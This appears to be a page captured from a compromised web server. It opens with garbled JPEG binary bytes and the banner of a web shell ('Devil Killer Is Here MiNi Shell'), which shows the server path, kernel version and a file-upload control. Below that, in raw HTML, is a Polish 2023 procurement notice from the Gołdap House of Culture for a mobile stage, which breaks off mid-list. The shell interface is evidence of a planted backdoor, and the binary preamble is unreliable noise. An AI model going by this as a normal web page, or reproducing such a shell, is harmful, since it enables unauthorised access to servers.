JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20230919/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20230919/0040381601-N-2023.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Dostawy<br/> Dostawa sceny mobilnej typu S-M-S pełniącej funkcję estrady scenicznej i przyczepy do Domu Kultury w Gołdapi. </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">DOM KULTURY W GOŁDAPI</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 000687422</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">ul. Krótka 2</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Gołdap</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">19-500</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">warmińsko-mazurskie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL623 - Ełcki</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">sekretariat@dkgoldap.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">www.dkgoldap.pl</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - państwowe i samorządowe instytucje kultury</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Inna działalność</span> </h3> <p class="mb-0"> Wielokierunkowa działalność społeczno-kulturalna </p> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Dostawa sceny mobilnej typu S-M-S pełniącej funkcję estrady scenicznej i przyczepy do Domu Kultury w Gołdapi. </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-c17b87d7-5707-11ee-9aa3-96d3b4440790</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2023/BZP 00403816</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2023-09-19</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.15.) Nazwa projektu lub programu</h3> <p class="mb-0"> Poddziałanie 19.2 „Wsparcie na wdrażanie operacji w ramach strategii rozwoju lokalnego kierowanego przez społeczność” objęte Programem Rozwoju Obszarów Wiejskich na lata 2014–2020.Umowa nr 01163-6935-UM1411763/22 z dnia 24.04.2023 r., operacja pt. „Wzbogacenie oferty kulturalno-artystycznej uzdrowiska Gołdap do 2023 roku poprzez zakup sceny mobilnej” </p> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://ezamowienia.gov.pl/mp-client/search/list/ocds-148610-c17b87d7-5707-11ee-9aa3-96d3b4440790 <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">1. Postępowanie prowadzone jest w języku polskim w formie elektronicznej za<br/>pośrednictwem Platformy e-Zamówienia pod adresem: https://ezamowienia.gov.pl/<br/>2. W postępowaniu o udzielenie zamówienia publicznego komunikacja między Zamawiającym a wykonawcami odbywa się przy<br/>użyciu Platformy e-Zamówienia, która jest dostępna pod adresem https://ezamowienia.gov.pl<br/>3. Postępowanie można wyszukać ze strony głównej Platformy e-Zamówienia (przycisk „Przeglądaj postępowania/konkursy”),<br/>powołując się na jego tytuł lub znak sprawy.<br/>4. Wykonawca zamierzający wziąć udział w postępowaniu o udzielenie zamówienia publicznego musi posiadać konto podmiotu<br/>„Wykonawca” na Platformie e-Zamówienia. Szczegółowe informacje na temat zakładania kont podmiotów oraz zasady i warunki<br/>korzystania z Platformy e-Zamówienia określa Regulamin Platformy e-Zamówienia, dostępny na stronie internetowej<br/>https://ezamowienia.gov.pl oraz informacje zamieszczone w zakładce „Centrum Pomocy”.</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">1. Wszystkie wysyłane i odebrane w<br/>postępowaniu przez Wykonawcę wiadomości widoczne są po zalogowaniu, w podglądzie postępowania w zakładce „Komunikacja”.<br/>2. Minimalne wymagania techniczne oraz warunki techniczne dotyczące sprzętu używanego w celu korzystania z usług Platformy e –<br/>Zamówienia są następujące:<br/>2.1. Komputer PC:<br/>a) parametry minimum: procesor dwurdzeniowy, 2 GB RAM, HDD,<br/>b) zainstalowany jedne z poniższych systemów operacyjnych:<br/>-MS Windows 7 lub nowszy<br/>-OSX/Mac OS 10.10,<br/>-Ubuntu 14.04,<br/>c) zainstalowana jedna z poniższych przeglądarek:<br/>- Chrome 66.0 lub nowsza,<br/>- Firefox 59.0 lub nowszy,<br/>- Safari 11.1 lub nowsza,<br/>- Edge 14.0 i nowsze,<br/>2.2. Dla skorzystania z pełnej funkcjonalności może być konieczne włączenie w przeglądarce obsługi protokołu bezpiecznej<br/>transmisji danych SSL, obsługi Java Script, oraz cookies;<br/>2.3. Specyfikacja połączenia, formatu przesyłanych danych oraz kodowania i oznaczania<br/>czasu odbioru danych:<br/>a) specyfikacja połączenia – formularze udostępnione są za pomocą protokołu TLS1.2,<br/>b) format danych oraz kodowanie: formularze dostępne są w formacie HTML z kodowaniem UTF-8,<br/>c) oznaczenia czasu odbioru danych: wszelkie operacje opierają się o czas serwera i dane zapisywane są z dokładnością co do<br/>sekundy.<br/>3. Wymagania techniczne oraz informacje dotyczące specyfikacji połączenia określa Regulamin korzystania z Platformy e-<br/>Zamówienia.<br/>4. W przypadku problemów technicznych i awarii związanych z funkcjonowaniem Platformy e–Zamówienia użytkownicy zobowiązani<br/>są skorzystać ze wsparcia technicznego dostępnego pod numerem telefonu (32) 77 88 999 lub drogą elektroniczną poprzez<br/>formularz udostępniony na stronie internetowej https://ezamowienia.gov.pl zakładce „Zgłoś problem”. Maksymalny rozmiar plików<br/>przesyłanych za pośrednictwem „Formularzy do komunikacji” wynosi 150 MB (wielkość ta dotyczy plików przesyłanych jako<br/>załączniki do jednego formularza).<br/>5. Wykonawcy mogą zgłaszać reklamacje związane z nieprawidłowym działaniem Platformy e–Zamówienia za pośrednictwem<br/>Systemu Obsługi Zgłoszeń (SOZ). Wymaga to posiadania przez Wykonawcę konta na Platformie e–Zamówienia.<br/>6. Rozszerzenia plików wykorzystywanych przez Wykonawców muszą być zgodne z Załącznikiem nr 2 do “Rozporządzenia Rady<br/>Ministrów w sprawie Krajowych Ram Interoperacyjności, minimalnych wymagań dla rejestrów publicznych i wymiany informacji w<br/>postaci elektronicznej oraz minimalnych wymagań dla systemów teleinformatycznych”, zwanego dalej Rozporządzeniem KRI.<br/>7. Zamawiający rekomenduje wykorzystanie formatów: .pdf .doc .docx .xls .xlsx .jpg (.jpeg) ze szczególnym wskazaniem na .pdf<br/>8. W celu ewentualnej kompresji danych Zamawiający rekomenduje wykorzystanie jednego z rozszerzeń: .zip lub .7Z</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">1. Zamawiający oświadcza, że spełnia wymogi określone w Rozporządzeniu Parlamentu Europejskiego i Rady (UE) 2016/679 z 27 kwietnia 2016 r. w sprawie ochrony osób fizycznych w związku z przetwarzaniem danych<br/>osobowych i w sprawie swobodnego przepływu takich danych oraz uchylenia dyrektywy 95/46/WE (ogólne rozporządzenie o<br/>ochronie danych) (Dz.Urz. UE L 119 z 4 maja 2016 r.) – dalej: RODO – tym samym dane osobowe podane przez Wykonawcę będą<br/>przetwarzane zgodnie z RODO oraz zgodnie z przepisami krajowymi.<br/>2. Administratorem Pani/Pana danych osobowych w zakresie przeprowadzenia przedmiotowego postępowania jest: Dom Kultury w<br/>Gołdapi reprezentowana przez Dyrektora z siedzibą przy ul. Krótka 2, 19-500 Gołdap, adres e-mail: dyrektor@dkgoldap.pl , tel. 87<br/>615-08-03.<br/>3. Zamawiający wyznaczył Inspektora Ochrony Danych. Inspektorem Ochrony Danych jest: Sebastian Liwak e-mail: iod@egoldap.pl<br/>tel. 697-616-194.<br/>4. Dane osobowe Wykonawcy przetwarzane będą na podstawie art. 6 ust. 1 lit. c RODO w celu związanym z przedmiotowym<br/>postępowaniem o udzielenie zamówienia publicznego;<br/>5. Odbiorcami przekazanych przez Wykonawcę danych osobowych będą osoby lub podmioty, którym udostępniona zostanie<br/>dokumentacja postępowania zgodnie z art. 8 oraz art. 96 ust. 3 Ustawy Pzp, a także art. 6 Ustawy z 6 września 2001 r. o dostępie do<br/>informacji publicznej.<br/>6. Dane osobowe Wykonawcy zawarte w protokole postępowania będą przechowywane przez okres 4 lat od dnia zakończenia<br/>postępowania o udzielenie zamówienia. Jeżeli czas trwania umowy przekracza 4 lata, okres przechowywania obejmuje cały czas<br/>trwania umowy.<br/>7. Klauzula informacyjna, o której mowa w art. 13 ust. 1 i 2 RODO, znajduje się w Załączniku nr 2 do SWZ.<br/>8. Zamawiający nie planuje przetwarzania danych osobowych Wykonawcy w celu innym niż cel określony w pkt. 3 powyżej. Jeżeli<br/>administrator będzie planował przetwarzać dane osobowe w celu innym niż cel, w którym dane osobowe zostały zebrane (tj. cel<br/>określony w pkt.3 powyżej), przed takim dalszym przetwarzaniem poinformuje on osobę, której dane dotyczą, o tym innym celu oraz<br/>udzieli jej wszelkich innych stosownych informacji, o których mowa w art. 13 ust. 2 RODO.<br/>9. Wykonawca jest zobowiązany, w związku z udziałem w przedmiotowym postępowaniu, do wypełnienia wszystkich obowiązków<br/>formalnoprawnych wymaganych przez RODO i związanych z udziałem w przedmiotowym postępowaniu o udzielenie zamówienia.<br/>Należą do nich obowiązki informacyjne z:<br/>- art. 13 RODO względem osób fizycznych, których dane osobowe dotyczą i od których dane te Wykonawca bezpośrednio pozyskał i<br/>przekazał Zamawiającemu w treści oferty lub dokumentów składanych na żądanie Zamawiającego,<br/>- art. 14 RODO względem osób fizycznych, których dane Wykonawca pozyskał w sposób pośredni, a które to dane Wykonawca<br/>przekazuje Zamawiającemu w treści oferty lub dokumentów składanych na żądanie Zamawiającego.<br/>10. W celu zapewnienia, że Wykonawca wypełnił ww. obowiązki informacyjne oraz ochrony prawnie uzasadnionych interesów osoby<br/>trzeciej, której dane zostały przekazane w związku z udziałem w postępowaniu, Wykonawca składa oświadczenie o wypełnieniu<br/>przez niego obowiązków informacyjnych przewidzianych w art. 13 lub art. 14 RODO – treść oświadczenia została zawarta w<br/>Załączniku nr 2 do SWZ.</span></h3> <h3 class="mb-0">3.16.) RODO (ograniczenia stosowania): <span class="normal">Zamawiający informuje, że:<br/>- Zamawiający udostępnia dane osobowe, o których mowa w art. 10 RODO (dane osobowe dotyczące wyroków skazujących i<br/>czynów zabronionych), w celu umożliwienia korzystania ze środków ochrony prawnej, o których mowa w dziale IX Ustawy Pzp, do<br/>upływu terminu na ich wniesienie.<br/>- Udostępnianie protokołu i załączników do protokołu ma zastosowanie do wszystkich danych osobowych, z wyjątkiem tych, o<br/>których mowa w art. 9 ust. 1 RODO (tj. danych osobowych ujawniających pochodzenie rasowe lub etniczne, poglądy polityczne,<br/>przekonania religijne lub światopoglądowe, przynależność do związków zawodowych oraz przetwarzania danych genetycznych,<br/>danych biometrycznych w celu jednoznacznego zidentyfikowania osoby fizycznej lub danych dotyczących zdrowia, seksualności lub<br/>orientacji seksualnej tej osoby), zebranych w toku postępowania o udzielenie zamówienia.<br/>- W przypadku korzystania przez osobę, której dane osobowe są przetwarzane przez Zamawiającego, z uprawnienia, o którym<br/>mowa w art. 15 ust. 1–3 RODO (związanych z prawem Wykonawcy do uzyskania od administratora potwierdzenia, czy<br/>przetwarzane są dane osobowe jego dotyczące, prawem Wykonawcy do bycia poinformowanym o odpowiednich zabezpieczeniach,<br/>o których mowa w art. 46 RODO, związanych z przekazaniem jego danych osobowych do państwa trzeciego lub organizacji<br/>międzynarodowej oraz prawem otrzymania przez Wykonawcę od administratora kopii danych osobowych podlegających<br/>przetwarzaniu), Zamawiający może żądać od osoby występującej z żądaniem wskazania dodatkowych informacji, mających na celu<br/>sprecyzowanie nazwy lub daty zakończonego postępowania o udzielenie zamówienia.<br/>- Skorzystanie przez osobę, której dane osobowe dotyczą, z uprawnienia, o którym mowa w art. 16 RODO (z uprawnienia do<br/>sprostowania lub uzupełnienia danych osobowych), nie może naruszać integralności protokołu postępowania oraz jego załączników.<br/>- W postępowaniu o udzielenie zamówienia zgłoszenie żądania ograniczenia przetwarzania, o którym mowa w art. 18 ust. 1 RODO,<br/>nie ogranicza przetwarzania danych osobowych do czasu zakończenia tego postępowania.<br/>- W przypadku gdy wniesienie żądania dotyczącego prawa, o którym mowa w art. 18 ust. 1 RODO, spowoduje ograniczenie<br/>przetwarzania danych osobowych zawartych w protokole postępowania lub załącznikach do tego protokołu, od dnia zakończenia<br/>postępowania o udzielenie zamówienia Zamawiający nie udostępnia tych danych, chyba że zachodzą przesłanki, o których mowa w<br/>art. 18 ust. 2 rozporządzenia 2016/679.</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2><h3 class="mb-0">4.1.) Informacje ogólne odnoszące się do przedmiotu zamówienia.</h3> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">Zam. TO.240.7.2023</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Dostawy</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.5.) Wartość zamówienia: <span class="normal"> 184000 PLN </span> </h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> 1. Przedmiotem niniejszego zamówienia jest dostawa sceny mobilnej typu S-M-S pełniącej funkcję estrady scenicznej i<br/>przyczepy.<br/>2. Zakup przedmiotu niniejszego zamówienia jest sfinansowany na podstawie umowy nr 01163-6935-UM1411763/22 z dnia<br/>24.04.2023 r. w Olsztynie w ramach poddziałania 19.2 „Wsparcie na wdrażanie operacji w ramach strategii rozwoju<br/>lokalnego kierowanego przez społeczność” z działania 19 - Wsparcie dla rozwoju lokalnego w ramach inicjatywy LEADER<br/>objętego programem pt. „Rozwój ogólnodostępnej i niekomercyjnej infrastruktur turystycznej lub rekreacyjnej, lub kulturalnej<br/>w tym wyposażenie podmiotów działających w sferze kultury w ramach, objętego Programem Rozwoju Obszarów Wiejskich<br/>na lata 2014–2020.<br/>3. Zamawiający wymaga, aby dostarczony przedmiot zamówienia był fabrycznie nowy.<br/>W celu uniknięcia wieloznaczności leksykalnej, Zamawiający informuje, iż pojęcie „fabrycznie nowy” oznacza wytworzony<br/>(wyprodukowany) środek trwały który nie był używany przed nabyciem w jakiejkolwiek formie włącznie z jego częściami,<br/>posiadający certyfikat zgodności CE. Asortyment składający się na przedmiot zamówienia musi pochodzić z produkcji nie<br/>starszej niż 2023 r.<br/>4. Zamawiający dostawy sceny mobilnej wraz z pełną dokumentacją techniczną oraz dokumentami jakościowymi w języku<br/>polskim i/lub angielskim. Asortyment składający się na przedmiot zamówienia musi posiadać stosowne certyfikaty, atesty i<br/>raporty dopuszczające do sprzedaży i użytkowania na terenie RP. Zamawiający wymaga przeszkolenia co najmniej 2<br/>pracowników Zamawiającego w zakresie obsługi dostarczonego przedmiotu zamówienia.<br/>5. Szczegółowe określenie przedmiotu zamówienia zawarte jest w dokumencie ,,Formularz opis przedmiotu<br/>zamówienia” - Załącznik nr 1 do SWZ. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">44210000-5 - Konstrukcje i części konstrukcji</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <!-- realizacja w dniach --> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">120 dni</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert</h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">1. Za najkorzystniejszą zostanie uznana oferta, która uzyska najwyższą liczbę punktów obliczonych w<br/>oparciu o ustalone poniżej kryteria:<br/>a) Cena „C”- 60 %<br/>b) Czas reakcji serwisu gwarancyjnego w trakcie trwania gwarancji na podjęcie czynności związanych z usunięciem usterki (przyjazd<br/>serwisu i podjęcie działań naprawczych) „S”- 20 %<br/>c) Okres gwarancji „G”- 20%</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal"> Procentowo </span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: </h3> serwis posprzedażny, pomoc techniczna, warunki dostawy takich jak termin, sposób lub czas dostawy, oraz okresu realizacji. <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Czas reakcji serwisu gwarancyjnego w trakcie trwania gwarancji na podjęcie czynności związanych z usunięciem usterki (przyjazd serwisu i podjęcie działań naprawczych)</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">20</span></h3> <h3 class="mb-0">Kryterium 3</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: </h3> serwis posprzedażny, pomoc techniczna, warunki dostawy takich jak termin, sposób lub czas dostawy, oraz okresu realizacji. <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Okres gwarancji</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">20</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> 1. W zakresie warunków udziału w postępowaniu dotyczących:<br/>1.1. zdolności do występowania w obrocie gospodarczym,<br/>Zamawiający nie stawia warunku w powyższym zakresie.<br/>1.2. uprawnień do prowadzenia określonej działalności gospodarczej lub zawodowej, o ile wynika to z odrębnych przepisów,<br/>Zamawiający nie stawia warunku w powyższym zakresie.<br/>1.3. sytuacji ekonomicznej lub finansowej,<br/>Zamawiający nie stawia warunku w powyższym zakresie.<br/>1.4. zdolności technicznej lub zawodowej,<br/>Zamawiający uzna powyższy warunek za spełniony, jeżeli Wykonawca wykaże, że w okresie ostatnich trzech lat przed<br/>upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy – w tym okresie wykonał należycie co<br/>najmniej 2 (dwa) świadczenia polegające na dostawie sceny mobilnej lub realizacji zamówienia o zbliżonym charakterze do<br/>przedmiotu niniejszego zamówienia o wartości co najmniej 100 000,00 zł (słownie: sto tysięcy złotych 00/100) brutto każde.<br/>2. W przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia warunek musi spełniać w całości co<br/>najmniej jeden z Wykonawców lub podmiot trzeci, na zasoby którego powołują się Wykonawcy. <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">Zamawiający wezwie Wykonawcę, którego oferta została najwyżej oceniona, do złożenia w wyznaczonym terminie, nie krótszym niż<br/>5 dni od dnia wezwania, aktualnych na dzień złożenia następujących podmiotowych środków dowodowych tj.:<br/>1. wykaz dostaw wykonywanych nie wcześniej niż w okresie ostatnich 3 lat a jeżeli okres działalności jest krótszy- w tym okresie<br/>wraz z podaniem ich rodzaju, wartości, daty i miejsca wykonania oraz podmiotów na rzecz których dostawy te zostały wykonane<br/>wraz z załączeniem dowodów określających czy te dostawy zostały wykonane należycie przy czym dowodami są referencje bądź<br/>inne dokumenty sporządzone przez podmiot na rzecz którego dostawy zostały wykonane a jeżeli Wykonawca z przyczyn<br/>niezależnych od niego nie jest w stanie uzyskać tych dokumentów inne odpowiednie dokumenty, sporządzony wg Załącznika nr 6 do<br/>SWZ.</span> </h3> <h3 class="mb-0">5.8.) Wykaz przedmiotowych środków dowodowych: </h3> 1. 